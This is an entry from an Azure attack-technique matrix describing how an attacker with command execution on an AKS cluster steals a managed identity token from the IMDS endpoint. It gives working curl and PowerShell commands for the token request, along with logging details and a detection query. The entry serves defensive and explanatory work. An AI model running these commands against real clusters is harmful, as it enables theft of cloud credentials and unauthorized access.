AZT601.2 - Steal Managed Identity JsonWebToken: Azure Kubernetes Service IMDS Request

By utilizing access to IMDS, an attacker can request a JWT for a Managed Identity on an AKS Cluster if they have access to execute commands on the system.

Resource

Azure Kubernetes Service

Actions

• Microsoft.ContainerService/managedClusters/runcommand/action
• Microsoft.ContainerService/managedclusters/commandResults/read

Examples

PythonPowerShellAzure Portal

curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F' -H Metadata:true -s

powershell.exe -c $a=Invoke-Restmethod -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01"&"resource=https://management.azure.com/' -Method GET -Headers @{Metadata='true'} -UseBasicParsing;$a.access_token

Detections

Detection Details

Logs are only generated when running a command through az cli or Az PowerShell. Using kubectl will not generate logs.

Logs

Data Source	Operation Name	Action	Log Provider
Resource	RunCommand	Microsoft.ContainerService/managedClusters/runCommand/action	AzureActivity

Queries

Platform	Query
Log Analytics	AzureDiagnostics | where log_s has '169.254.169.254'

Azure Monitor Alert

Additional Resources

• https://docs.microsoft.com/en-us/azure/aks/command-invoke
• https://docs.microsoft.com/en-us/azure/aks/use-managed-identity